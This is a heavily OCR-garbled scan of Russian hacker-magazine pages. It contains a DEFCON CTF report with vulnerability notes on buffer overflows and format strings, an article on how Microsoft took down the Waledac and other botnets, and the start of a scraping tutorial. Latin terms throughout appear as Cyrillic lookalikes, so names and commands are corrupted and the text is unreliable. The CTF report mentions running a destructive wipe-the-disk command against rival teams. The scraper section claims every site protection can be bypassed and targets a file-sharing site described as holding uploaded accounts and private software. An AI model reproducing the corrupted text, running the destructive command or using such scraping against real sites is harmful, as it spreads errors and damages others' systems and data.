маши ну таким образом, что, даже получив доступ, соперники не могли 
прочитать наши флаги, находящиеся на реальном сервере, а мы могли 
снимать и анализировать трафик, приходящий к нам. 

Игровыеочки начислялись командам за похищение флага и/или 
перезапись своим специальным флагом- марке ром. После перезаписи 
флаги автоматически восстанавливались в прежние, сохраняя воз- 
можность другим командам похитить их. Начисленные очки за флаги 
умножались на процент доступности сервисов, предотвращая ситуа- 
цию, когда команды просто выключили бы все сервисы и достигли 
100%-ной защиты. Доступ н ость сервисов проверялась через бэкдор в 
приложениях — если бэкдор жив, значит, и приложение работает. До- 
полнительные очки за «первую кровь» давались командам, которые 
первыми сумели проэксплуатировать уязвимость в сервисе. 
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0X04. ОРГАНИЗАЦИЯ 

Примеры заданий мы привели во врезке, а более детальное описание 
взлома каждого из сервисов и примеры эксплоитов ты можешь 
найти в блогах нашей команды. Стоит отметить, что игра в этот раз 
была спроектирована из рук вон плохо. Обычно разработчики СТР 
стараются свести на нет вероятность получения рута. Иначе, по- 
лучив рут, команда сможетутянуть флаги отсервисов, которые не 
были по-настоящему взломаны, а напоследок выполнить «пт -гР 
/», досрочно завершая игру для соперника. Сервис Іотаіо должен 
был понижать привилегии с гооі до юзера Іотаію, но та ко го юзера не 
существовало — зато существовал Іотаіог. Проэксплуатировав это 
приложение на сервере невнимательной команды, можно было полу- 
чить гооі и стащить все флаги. Мы нашли одну та кую команду, успели 
стащить все флаги, но закрепиться, к сожалению, не успели. 

На второй денькоманда ІоІІег5к8іеггумудриласьобойти ограни- 
чения разработчиков и выйти из ^іГа, получив рутнахост-машине. 
Ребята собрали все флаги со всех команд, но почему-то не озаботились 
доступностью своих сервисов, поэтому очков заработать не смогли до 
того момента, как разработчики все за патч ил и. 

На третий день игры часть наших игроков, незанятых реверсом, ре- 
шила проска нить сетки других команд в поисках чего-нибудь вкусного 
на пользовательских машинах. Забавно было найти открытый веб- 
сервер команды РШ50Ро5ІесЬ со всеми их наработками поэксплои- 
там, логами работы эксплоитов с флагами и приватнымззН ключом 
от их сервера. На ОБРСОИ с вашим компьютером может произойти что 
угодно, важнонезабыватьобэтом. 

0X05. ѴѴНАТ НАРРЕИЗ ІИ ѴЕ6А5 5ТАУБ ІІМ ѴЕ6А5 

После соревнований мы сняли пентхаус на 29-м этаже отеля ВеІІадіо 
и устроили айеграгіу с блекджеком и распут шахматами и поэзией 
Шекспира. Лас Вегас — это город, в котором совсем не хочется 
заниматься информационной безопасностью, однако около 15 000 
посетителей ВІаскНаІиОЕРСОМ ежегодно приезжают туда, чтобы 
провести неделю в готовности к кибервойне. Впрочем, для то го что- 
бы поучаствовать в СТР, далеко ехать не надо: в России также про- 
водятся игры, с каждым годом набирающие все больше и больше 
участников — РиСТР, «Си бъ Цтфъ», І_ееІ Моге СТР, СИСТР и многие 
другие. Тем, кто хочет попробовать свои с илы в навыке боевого 
хакинга в условиях ограниченно го времени и сна, нужно с ко рее 
собирать команду и регистрироваться на ближайших соревновани- 
ях! Студентам, подумывающим о работе в сфере информационной 
безопасности, стоит иметь в виду, что многиеИБ- компании под- 
бирают сотрудников в штат прямо на подобных конте стах. Атакую 
возможность нельзя упускать. ИНИ 



Сервис: РогдеШ 



Порт: 3128 



Функциональность: При соединении в три этапа читает данные из сокета. 
На каждом этапе по данным считается хеш-функция от полученных 
данных, и если хеш удовлетворяет указанному, то программа переходит 
на следующий этап. На первом этапе все просто: нужно не получить хеш, 
равный 0ХВЗЗѲ07ОЗ (он используется организаторами для активации 
бэкдора, проверяющего работоспособность сервиса]. На втором этапе 
нужно получить хеш 0хРС1ВЕ02А, тогда программа идет дальше. При этом 
максимальное значение считываемых данных из сокета на этих этапах 
127 байт, что не превышает размер выделенного на стеке массива. 

Уязвимость: Переполнение буфера находится на третьем этапе, когда 
после подсчета очередного хеша по входным данным программа 
использует хеш в качестве значения максимального количества байт 
при считывании следующей порции данных. Вот тут-то в стековый буфер 
(сіаііа] размером в 128 байт можно записать столько байт, сколько нужно 
для переполнения и эксплоита (последний вызов КасѵйаІіаРготБоскеІ:]. 



Ход решения: К большому сожалению, купились на большой размер 
файла и не стали разбирать его в самом начале, хотя переполнение 
очень простое — сбрутить хеш и написать эксплоит. 



Сервис: Бапсіу 



Порт: — 



Функциональность: Бапсіу представляет собой некий сильно 
упрощенный интерпретатор языка С. 



Уязвимость: Через сазіііе можно передать программу, которая бы 
считывала ключи и отправляла их нам, а заодно и перезаписывала бы 
ключи у соперника. Однако не все так просто. К сожалению, Іюреп не 
интерпретировался должным образом и пришлось искать обходные 
варианты. 

Ход решения: Рореп использовать нельзя, зато отлично работает 
ІргіпШ в которую в качестве параметров можно передать уязвимую 
форматную строку и заодно эксплоит. 



Сервис: БЬеерзІег 



Порт: 5775 



Функциональность: При соединении читает данные из сокета и 
сравнивает с указанными значениями. Если сравнения прошли успешно, 
то просит ввести имя и приветствует: «Іліеісоте ±о *Ие сІсШек Ыо§». 
Само по себе приложение представляет собой упрощенный аналог 
блога, в котором можно добавлять и просматривать записи. 

Уязвимость: Первая проверка введенных данных проходит со строкой 
« 22 у 2 хгсІ». Если она прошла успешно, то выставляется флаг (Па§), при 
котором в дальнейшем в программе вместо Іриіъ используется {ргіпЙ с 
уязвимой форматной строкой. Вторая проверка со строкой «х' 1ХРРТН@8» 
после применения несложного кодирования (входная строка должна 
быть «хеѵ§сІігкІіе»], при успешности флаг сбрасывается и используется 
-рриіів. Если ни та, ни другая проверки не прошли, соединение 
обрывается. Собственно, нам нужно было пройти именно первую 
проверку и проэксплуатировать уязвимую форматную строку. 



Ход решения: В то время как одна часть команды ночью пыхтела 
над Ьіѵег'ом, вторая часть исследовала дампы трафика и искала 
успешные атаки на наши сервисы. Ребята поработали очень хорошо, 
объединив уже имеющиеся знания о сервисе, с «успешными» атаками, 
проведенными нашими конкурентами на нас, и получили нужный 
эксплоит. «Успешными» в кавычках, потому что конкуренты все равно не 
получили наших флагов — сработала наша тактика защиты. Стратегия 
под названием «атакуй меня, чтобы я атаковал тебя». 
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Как закрывают 
ботнеты 



В последнее время о ботнетах в рунете го- 
воряточень много. В основном это связано с 
ООоБ-атаками на известные и посещаемые 
ресурсы. Однако первые прототипы современ- 
ных ботнетов были обнаружены еще в 1999 году. 



ОПЫТ КРУПНЫХ 
КОМПАНИЙ БОРЬБЫ С 
КИБЕРПРЕСТУПНОСТЬЮ 




Схема использования ботнета 



ЧТО ТАКОЕ БОТНЕТ? 

Ботнет представляет собой совокупность систем, зараженных 
вредоносным кодом и управляемых централизованно. Причем устро- 
ен он таким образом, что уничтожение или отключение достаточно 
большого количества узлов не должно влиять на его работоспособ- 
ность в целом. Ботнеты могут использоваться для таких целей, как 
рассылка спама, фишинг, ББоБ, атаки на другие системы, заражение 
новых ПК и превращение их в узлы ботнета. Стоит отметить, что в 
данный момент индустрия кибер преступи ости довольно сильно 
сегментирована по специализации и направленности преступлений. 
Это означает, что каждый занимается своим делом. В результате 
получается, что создатель ботнета продает ресурсы илиуслуги 
ботнета другим злоумышленникам, специализирующимся на тех или 
иных видах преступлений (типовую бизнес- структуру ты можешь 
посмотреть на иллюстрации]. Стоит отметить, что интерфейс управ- 
ления ботнетом довольно прост. С ним может справиться человек, 
обладающий даже очень низкой квалификацией. В соответствии с 
облачными веяниями, в последнее время поя вилась услуга Маіѵѵаге 
аза Бегѵісе. Если кто-то не может создать и распространять свой 
зловредный код, всегда найдется более опытный провайдер таких 
услуг, способный сделать это за определенные деньги. Впрочем, 
создать ботнет сегодня тоже не бог весть какая сложная задача. На 
рынке есть множество готовых наборов для изготовления ботне- 
та, таких как2Ьо1: (2еиз), Бруеуе, Магіроза, ВІаск Епегду, ВіШегРІу, 
Рербіе. Это означает, что современные владельцы ботнетов могут 



058 



ХАКЕР 10/153/2011 





даже не обладать какими-либо особыми технологическими навы- 
ками. Впрочем, если говорить о крупных ботнетах, то их создатели — 
это, безусловно, способные, талантливые люди, бороться с которыми 
довольно сложно. В рамках этого материала я хотел бы рассказать о 
практиках, которые используются большими компаниями для борьбы 
с киберпреступностью и, в частности, ботнетами. Речь, в частности, 
пойдет об активности компании М іеговой, в которой я и работаю. 

МІСР050ЕТѴ5. БОТНЕТ 

Возможно, это и заставит кого-то улыбнуться, нов М іеговой в по- 
следние несколько лет наблюдается серьезная работа по повышению 
безопасности продуктов и сервисов. Появились и стали применяться 
методологии разработки безопасного кода 50І_, что ключевым образом 
повлияло на количество найденных за последнее время уязвимостей 
(особенно тех, которые можно эксплуатировать). Но речь сегодня пой- 
детне о превентивных мерах, которые могутпредотвратитьбудущие 
угрозы, а о борьбе с проблемами, которые актуальны сегодня. Большое 
количество зараженных машин — как раз та кая проблема. 

Внутри компании был создан целый ряд подразделений по борьбе с 
киберпреступлениями. Последние носят разные имена — Оіді^аІ Сгіте 
ІІпіІ, МісгозоЙ Бесигііу Резропзе Сеп*ег, М іеговой Маіѵѵаге Ргоіесііоп 
СепІег,Тгиз1;\л/огіИ СотріЛіпд, — но задачи каждого так или иначе 
пересекаются с проблемой киберпреступности. Вместе с правоохрани- 
тельными органами и исследовательскими организациями МісгозоЙ 



начал операции по уничтожению крупнейших ботнетов. Звучит громко? 
Возможно, ноза годбылиуничтоженытакиеботнеты, как: 

• Рив^оск, рассылавший 80 % мирового спама. 

• СогеЛооб, который служил инструментом для финансовых пре- 
ступлений, принесших более $100 млн убытков. 

• ѴѴаІебас, боты которого отправляли 1,5 млрд спам- сообщений 
ежедневно. В процессе его исследования было найдено пол- 
миллиона паролей от почтовых ящиков пользователей и РТР- 
серверов. 

БОРЬБАС БОТНЕТАМИ: ОБЩИЕ ПРАКТИКИ 

Для того чтобы понять типовые способы уничтожения ботнета, надо 
разобраться с его архитектурой и слабыми местами. Чаще все го для 
управления ботнетом используется один или несколько командных 
(часто центральных) серверов, называемыхСоттапсІ & СопйоІ, или 
С&С. Они взаимодействуют с конечными узлами ботнета по разным 
протоколам. Наиболее часто в качестве протокола управления ис- 
пользуется ІРС. Впрочем, в последнее время резко увеличилось при- 
менение Р2Р-протоколов как бол ее устойчивой, хотя и технологически 
сложной альтернативы. Интересной экзотикой в последнее время 
стало использование для управления ботнета файлообменных сетей 
и передача управляющих команд в теле фотографий, публикуемых на 
РасеЬоок.Такили иначе, для борьбы с ботнетом можно предпринять 
несколько конкретных действий: 








Судебное решение по- 
зволило приостановить 
действие доменов, ис- 
пользуемых ботнетом 
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Закрытие ботнетов резко сократило количество мирового спама 
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взлом 



• Захватить или вывести изстроя С&С-узлы. 

• 00о5 на С&С-узлы. 

• Жалобы провайдеру, где хостятся С&С-узлы. 

• ЗахватйМЗ-имен, используемых С&С. 

• Блокирование ІРадресов. 

• Арествладельца ботнета. 

• Судебный иск. 

К сожалей ию, не все из этих способов эффективны, а некоторые и 
вовсе незаконны. Между тем некоторые из них нам успешно уда л ось 
применить. Так, ботнеты Пизіюск и СогеНооб бы л и уничтожены доволь- 
но тривиально. Это удалось сделать с помощю захвата С&С-серверов 
правоохранительными органами по решению суда. Затем правитель- 
ство США да л о правоохранительным органам разрешение с помощью 
командного интерфейса ботнета послать командуудаления кода 
мал вари с зараженных машин. Работа по закрытию другого ботнета — 
ѴѴаІебас — оказалась еще более интересной, и на этом моменте я хотел 
бы остановиться подробнее. 

ѴѴАЬЕОАС: УСТРОЙСТВО 

С л ожн ость борьбы с ѴѴаІеба с заключалась в децентрализованной схе- 
ме работы ботнета. Для его работы было зарезервировано ни много ни 
мало 277 доменных имен. Это значит, что захватывать сервера нужно 
было одновременно у разных провайдеров хостинга. Кроме того, для 
управления ботнетом успешно использовался Р2Р-механизм. Если 
посмотреть на схему ботнета, то сразу бросается в глаза многослой- 
н ость управляющих серверов. В процессе заражения системы с по- 
мощью ѴѴаІебас зловредный код определяет, какую роль будет выпол- 
нять новый узел. Он становится либо простым узлом, рассылающим 
спам, если находится за ЫАТ и не принимает входящие соединения на 
80 й порт, либоузлом, который повторяет(ретранслирует) команды из 
центра, — то есть своего рода репитером. Репитеры используются для 
управления ботнетом. Каждый репитер кроме передачи управляю- 
щих команд узлам- спа мерам поддержи ваеттакже список «соседей», 
состоящий из 100 узлов, также выполняющих роль ретранслятора, 
к которым он может подключиться по Р2Р протоколу. Со временем 
любой узел-повторитель регистрирует свое доменное имя в {азНІих 
□ N5. Это делается для того, чтобы дать возможность обращаться к 



НЕТАКИЕ, КАК ВСЕ 



Опрометчиво считать, что ботнеты состояттолько из ѴѴіпсІоѵѵз -машин. 
Естьботнеты и на Ыпих/ІІпіх — РзуЬОі:, СЬиск Моггіз, насчитывающие сот- 
ни тысяч устройств. В основном та кие ботнеты создаются из домашних 
маршрутизаторов, коммутаторов и ЫА5 нижнего ценового диапазона. 
Уничтожитьтакойботнеткрайнетрудно,таккакдомашний пользователь 
в большинстве случаев не обладает знаниями в Ыпих и навыками обнов- 
ления прошивки устройства. Производительустройствазаинтересован в 
быстромустареванииустройства и часто нетолько не намеренустранять 
недостатки, ной не имеет механизмов централизованного обновления 
своих продуктов. Поданным исследования от 2009 года, в интернете в 
любой момент можно найти несколько милл ионов домашнихустройств с 
устаревшими прошивками и паролями по умолчанию. 




Каждый репитер поддерживаетсписок«соседей» 




ТЗСі-ЕШяір 






Прлпнр** ші 



«ЧЧІфАМ** 

/ 140 Чч 







Многослойная архитектура управления ѴѴаІесІас 



Подключение серверов МісгозоМ кѴѴаІесІас 



060 



ХАКЕР 10/153/2011 




Как закрывают ботнеты 




Регистрация доменного имени 

себе узлам-спамерам, если ближайший к ним репитер вдруг выйдет 
из строя и станет недоступен. Таким об разом узлы ботнета всегда 
могут найти ближайший узел-ретранслятор и получать от него 
ко манды и обновления исполняемо го кода. Со временем роли узлов 
могут меняться. Если система, используемая как ретранслятор, к 
примеру, попадает в корпоративную сеть и лишается возможности 
принимать подключения на 80-й порт, то она автоматически полу- 
чает роль спамера. При этом проанализировать топологию ботнета 
не так просто, потому как еще одной задачей репитера является 
противодействие исследованию топологии ботнета. Он служит 
своеобразным прокси и не позволяет узлам -спа мерам знать что- 
либо об управляющих узлах С&С. 

ШЬЕОАС: УНИЧТОЖЕНИЯ 

Проанализировавархитектуруботнета, мы проработали план для 
атаки на ботнет со следующими конкретными шагами: 

1. Нарушение р2р-механизма обмена управляющими командами. 

2. Нарушение обмена ОМЗ/НТТР-командами. 

3. Нарушение работы двух верхних слоев С&С-серверов. 

Первым делом нужно было прервать работу Р2Р- механизма. В 
связи стем, чтофункция нахождения ближайшего ретранслятора 
внутри ботнета работала нестабильно, была возможна ситуация, что 
узлу приход и л ось перебрать до 20 адресов, находящихся в его списке 
«соседей», чтобы найти работающий соседний репитер. Благодаря 
этому нам уда л ось создать поддельные репитеры, включить их в со- 
ставботнета и начать распространятьфальшивые обновления списка 
репитеров, тем самым нарушив связность системы управления Р2Р. 

Это позволило передавать команды узлам-спамерам от специально 
созданных командных серверов М іеговой. 

В случае неработоспособности Р2Р-механизмаузлы ботнета 
начинают искать друг друга с помощью механизма {азНІих йМБ. 
Поэтому необходимо было разрушить и этот способ управления, чтобы 
злоумышленник не мог восстановить контроль над ботнетом. Это 
интересный момент, потому что здесь мы использовали юридический 
механизм. Типичная процедура отзыва ОЫЗ имени через I САЫ N с по- 
мощью процедуры со страшным названием «ІІпі^огт Бота іп- Мате 
Оізриіе-Пезоіи^іоп Роіісу» может занять довольно много времени. Это 
позволило бы злоумышленникам успеть осознать, что их атакуют, 
и предпринять меры по регистрации новых БЫЗ-имен, на которые 
позже перевести у правление ботнетом. Поэтому вместо стандартной 




Стандартный подход куправлению ботнетом 

процедуры ІСАЫ N мы воспользовались процедурой ТПО (іетрогагу 
гезйаіпіпд огбег] — возможностью временно приоста на вливать дей- 
ствие доменов на 28 дней. На этом этапе еще одной сложностью было 
то, что часть ВЫЗ-и мен была зарегистрирована на территории Китая и 
Нидерландов. Поводом для судебного иска было на рушен неторговой 
марки МісгозоЙ и РЛгег. Ботнетактивно рассылал письма суведом- 
лениями о выигрыше в несуществующей лотерее МісгозоЙ и рекламу 
поддельныхлекарств под маркой РЛгег. 

Для того чтобы злоумышленники могли побороться с М іеговой в 
суде, ежели у них появится желание заявить свои права на ботнет, на 
сайте было опубликовано исковое заявление. Также в националь- 
ных газетах на территории стран, откуда подозреваемые управляли 
ботнетом, были опубликованы уведомления о вызове в суд. Каки 
предполагалось, никто не посмел явиться в суд и заявить о своих 
правах на ботнет. Таким образом МісгозоЙ выиграл суд на территории 
США, Китая и Нидерландов. Подробнее о юридических тон костях и 
перипетиях борьбы за ботнет можно почитать в специальном разделе 
сайта МісгозоЙ ( ЫСІѵ/гІРІІРА ). 

В результате этих юридических действий права на РИЗ перешли 
к М іеговой. На данный момент РЫЗ-имена подключены к серверам 
М іеговой. В случае, если к этим серверам подключается зараженный 
узел из ботнета, на него подается команда, приказывающая боту 
бездействовать. К сожалению, МісгозоЙ не имеет права удалить 
вредоносный код бота ѴѴаІебас, поэтомумы связываемся спровай- 
дера ми, через которых пользователь подключен к Сети ипросимих 
помочь пользователю избавиться от вредоносного кода с помощью 
бесплатных утилит, таких как МісгозоЙ Беси гііу Еззеп^іаІ и Маіісіоиз 
ЗоЙѵѵаге ПетоѵаІ ТооІ. 



ЗАКЛЮЧЕНИЕ 

Мы на деемся та ким об разом постепенно очистить интернет от по- 
следних остатков ботнета ѴѴаІ бас. Чтобы злоумышленникам было 
неповадно в дальнейшем создавать ботнеты, МісгозоЙ в сотрудни- 
честве с правоохранительными органами продолжает расследо- 
вание и сбор доказательств. С этой целью мы предложили награду 
в $250 000 тому, кто сообщит сведения, способствующие аресту 
преступной группы, стоявшей за Пиз^оск [ ЬИ:.Іѵ/оР7х88 ]. По на- 
шему опыту, такой подход может сработать. В завершение хочется 
сказать, что МісгозоЙ и в дальнейшем намерен активно бороться 
с киберпреступлениями, преследуя злоумышленников всеми до- 
ступными ему способами. НЕ 
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ДОБЫВАЕМ ЦЕННУЮ 
ИНФОРМАЦИЮ С ЧУЖИХ САЙТОВ 



Автоматический сбор информа- 
ции с чужих сайтов в больших 
объемах — задача простаятоль- 
ко на первый взгляд. Сегодня я 
поделюсь стобой конкретным 
опытом по созданию грабберов 
для удаленных ресурсов на при- 
мере всем известных сервисов 
гпагпЬа.ги и зііі.ги. 



гпл 

Нанашемдискеты 
найдешьвидео, под- 
робноописывающее 
процесспарсинга 
сервиса зііі.ги. 

Такженадискмы 
заботливо выложили 
все необходимые 
скрипты и примеры. 



НТМЬкод, который 
мы получаем со зііі.ги 




ред положим, перед нами стоит за дача проанализировать 
миллион страниц одного сайта и собрать с них какую-то 
конкретную информацию: выдратьссылки, телефоны, имена 
и та к да л ее. Вроде как затея очень простая и решается несложным 
скриптом, который будет ходить по сайту, анализировать контент и вы- 
дирать оттуда нужны еда иные. 

Однако наделе всё не так просто: любые сервисы незаинтересова- 
ны в том, чтобы с их системами работали боты. Никто не хочет, чтобы у 
него воровали информацию, загружали сервера ненужным трафиком 
и полностью игнорировали рекламу. Поэтому все крупные сервисы 
активно борются с ботами, используя разнообразные технологи и: 

• САРТСНА; 

• авторизацию (соокіе, сессии); 

• сертификаты; 

• ^ѵаЗсгірІ-защиту; 

• лимитсоединений; 

• генерацию ключей доступа через ЛазЬ; 

• другие, более изощренные способы защиты. 

Впрочем, все используемые технологии — это не полное решение 
проблемы, а всего л ишь усложнение процедуры: обойти при граббинге 
можноабсолютно всё. 




ПРАКТИКА 

Как говорится, лучше один раз увидеть, чем сто раз услышать. Поэтому 
приступим кпрактической части, в которой мы напишем простой пар- 
сер для удобного фа й л ообмен ника зііі.ги . 

Выбор пал на него, так как никаких особых за щит веб-сервер этого 
ресурса не ставит, а сам он содержит много интересной информации, 
такой какзагруженныеаккаунты, приватный софти другие интересно- 
сти. Рассмотрим инструментарий, который мы будем использоватьот 
начала написания бота и до первых полученных результатов: 

• Браузер. 

• РНР. 

• сІІРІ_. 

• Плагин ЫѵеНТТРНеасІегз для МогіІІа Ріге^ох. 
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